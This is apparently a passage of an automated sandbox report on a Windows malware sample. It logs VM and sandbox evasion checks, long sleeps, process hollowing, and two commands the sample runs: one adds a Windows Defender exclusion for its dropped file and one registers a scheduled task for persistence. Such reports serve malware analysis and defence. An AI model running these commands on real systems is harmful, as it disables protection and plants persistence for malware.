                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match File source: 00000000.00000002.346224005.0000000002864000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000002.344442888.000000000260D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe PID: 3984, type: MEMORYSTR
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.346224005.0000000002864000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.344442888.000000000260D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.346224005.0000000002864000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.344442888.000000000260D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe TID: 3808 Thread sleep time: -43731s >= -30000s
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe TID: 4400 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6948 Thread sleep time: -2767011611056431s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6812 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe TID: 6196 Thread sleep time: -6456360425798339s >= -30000s
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe TID: 1036 Thread sleep count: 4364 > 30
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe TID: 1036 Thread sleep count: 3139 > 30
                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4615
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 512
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Window / User API: threadDelayed 4364
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Window / User API: threadDelayed 3139
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Thread delayed: delay time: 43731
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.344442888.000000000260D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.344442888.000000000260D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.344442888.000000000260D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000002.526245210.00000000010D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.344442888.000000000260D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Process token adjusted: Debug
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Memory written: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HksvOcmoc.exe
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HksvOcmoc" /XML "C:\Users\user\AppData\Local\Temp\tmpCB43.tmp
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
